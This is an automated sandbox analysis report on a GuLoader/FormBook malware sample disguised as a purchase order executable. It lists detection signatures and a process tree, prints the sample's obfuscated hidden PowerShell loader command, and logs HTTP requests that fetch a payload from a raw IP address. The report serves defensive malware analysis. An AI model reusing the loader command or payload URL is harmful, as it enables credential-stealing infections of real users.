Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
purchase.order.exe

Overview

General Information

Sample name:purchase.order.exe
Analysis ID:1572377
MD5:8125e510df447b0ead0e263d006a253e
SHA1:d1c5a46902e50a785d7be8822b5e80e262cf640d
SHA256:91e694f4ad9556406db3d63be6b1917edbd509118a83a9d920fc758f0b8d0a54
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • purchase.order.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\purchase.order.exe" MD5: 8125E510DF447B0EAD0E263D006A253E)
    • powershell.exe (PID: 7584 cmdline: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Fathoming.exe (PID: 6888 cmdline: "C:\Users\user\AppData\Local\Temp\Fathoming.exe" MD5: 8125E510DF447B0EAD0E263D006A253E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2661158092.0000000008F37000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), CommandLine: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase.order.exe", ParentImage: C:\Users\user\Desktop\purchase.order.exe, ParentProcessId: 7344, ParentProcessName: purchase.order.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), ProcessId: 7584, ProcessName: powershell.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), CommandLine: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase.order.exe", ParentImage: C:\Users\user\Desktop\purchase.order.exe, ParentProcessId: 7344, ParentProcessName: purchase.order.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), ProcessId: 7584, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-10T14:09:52.971466+010028032702Potentially Bad Traffic192.168.2.1049707212.162.149.6680TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.binAvira URL Cloud: Label: malware
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeReversingLabs: Detection: 18%
      Multi AV Scanner detection for submitted file
      Source: purchase.order.exeReversingLabs: Detection: 18%
      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: purchase.order.exeJoe Sandbox ML: detected
      Source: purchase.order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: purchase.order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: stem.Core.pdba source: powershell.exe, 00000002.00000002.2642154478.0000000006D9F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: Fathoming.exe, 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2950366409.0000000021901000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Fathoming.exe, Fathoming.exe, 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2950366409.0000000021901000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49707 -> 212.162.149.66:80
      Source: global trafficHTTP traffic detected: GET /JiYpNWaslXZHcEPiPEuXaEONVju173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.66Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: global trafficHTTP traffic detected: GET /JiYpNWaslXZHcEPiPEuXaEONVju173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.66Cache-Control: no-cache
      Source: Fathoming.exe, 00000008.00000002.2990245007.0000000006028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin
      Source: Fathoming.exe, 00000008.00000003.2948566344.0000000006074000.00000004.00000020.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000002.2990340347.0000000006074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin)
      Source: powershell.exe, 00000002.00000002.2642154478.0000000006D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: purchase.order.exe, 00000000.00000000.1421338279.000000000040A000.00000008.00000001.01000000.00000003.sdmp, purchase.order.exe, 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Fathoming.exe, 00000008.00000000.2633837075.000000000040A000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: powershell.exe, 00000002.00000002.2659979907.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: purchase.order.exe
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Fathoming.exeJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22B60 NtClose,LdrInitializeThunk,8_2_21B22B60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_21B22DF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_21B22C70
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B235C0 NtCreateMutant,LdrInitializeThunk,8_2_21B235C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B24340 NtSetContextThread,8_2_21B24340
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B24650 NtSuspendThread,8_2_21B24650
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22BA0 NtEnumerateValueKey,8_2_21B22BA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22B80 NtQueryInformationFile,8_2_21B22B80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22BF0 NtAllocateVirtualMemory,8_2_21B22BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22BE0 NtQueryValueKey,8_2_21B22BE0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22AB0 NtWaitForSingleObject,8_2_21B22AB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22AF0 NtWriteFile,8_2_21B22AF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22AD0 NtReadFile,8_2_21B22AD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22DB0 NtEnumerateKey,8_2_21B22DB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22DD0 NtDelayExecution,8_2_21B22DD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22D30 NtUnmapViewOfSection,8_2_21B22D30
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22D10 NtMapViewOfSection,8_2_21B22D10
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22D00 NtSetInformationFile,8_2_21B22D00
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22CA0 NtQueryInformationToken,8_2_21B22CA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22CF0 NtOpenProcess,8_2_21B22CF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22CC0 NtQueryVirtualMemory,8_2_21B22CC0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22C00 NtQueryInformationProcess,8_2_21B22C00
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22C60 NtCreateKey,8_2_21B22C60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22FB0 NtResumeThread,8_2_21B22FB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22FA0 NtQuerySection,8_2_21B22FA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22F90 NtProtectVirtualMemory,8_2_21B22F90
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22FE0 NtCreateFile,8_2_21B22FE0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22F30 NtCreateSection,8_2_21B22F30
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22F60 NtCreateProcessEx,8_2_21B22F60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22EA0 NtAdjustPrivilegesToken,8_2_21B22EA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22E80 NtReadVirtualMemory,8_2_21B22E80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22EE0 NtQueueApcThread,8_2_21B22EE0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22E30 NtWriteVirtualMemory,8_2_21B22E30
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B23090 NtSetValueKey,8_2_21B23090
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B23010 NtOpenDirectoryObject,8_2_21B23010
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B239B0 NtGetContextThread,8_2_21B239B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B23D10 NtOpenProcessToken,8_2_21B23D10
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B23D70 NtOpenThread,8_2_21B23D70
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_00406C5F0_2_00406C5F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06FBBB4E2_2_06FBBB4E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB01AA8_2_21BB01AA
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA41A28_2_21BA41A2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA81CC8_2_21BA81CC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8A1188_2_21B8A118
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE01008_2_21AE0100
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B781588_2_21B78158
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B820008_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB03E68_2_21BB03E6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE3F08_2_21AFE3F0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAA3528_2_21BAA352
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B702C08_2_21B702C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B902748_2_21B90274
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB05918_2_21BB0591
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF05358_2_21AF0535
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9E4F68_2_21B9E4F6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B944208_2_21B94420
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA24468_2_21BA2446
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEC7C08_2_21AEC7C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF07708_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B147508_2_21B14750
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0C6E08_2_21B0C6E0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A08_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BBA9A68_2_21BBA9A6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B069628_2_21B06962
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD68B88_2_21AD68B8
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1E8F08_2_21B1E8F0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFA8408_2_21AFA840
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF28408_2_21AF2840
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA6BD78_2_21BA6BD7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAAB408_2_21BAAB40
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA808_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B08DBF8_2_21B08DBF
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEADE08_2_21AEADE0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8CD1F8_2_21B8CD1F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFAD008_2_21AFAD00
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B90CB58_2_21B90CB5
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0CF28_2_21AE0CF2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0C008_2_21AF0C00
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6EFA08_2_21B6EFA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFCFE08_2_21AFCFE0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE2FC88_2_21AE2FC8
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B10F308_2_21B10F30
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B92F308_2_21B92F30
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B32F288_2_21B32F28
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B64F408_2_21B64F40
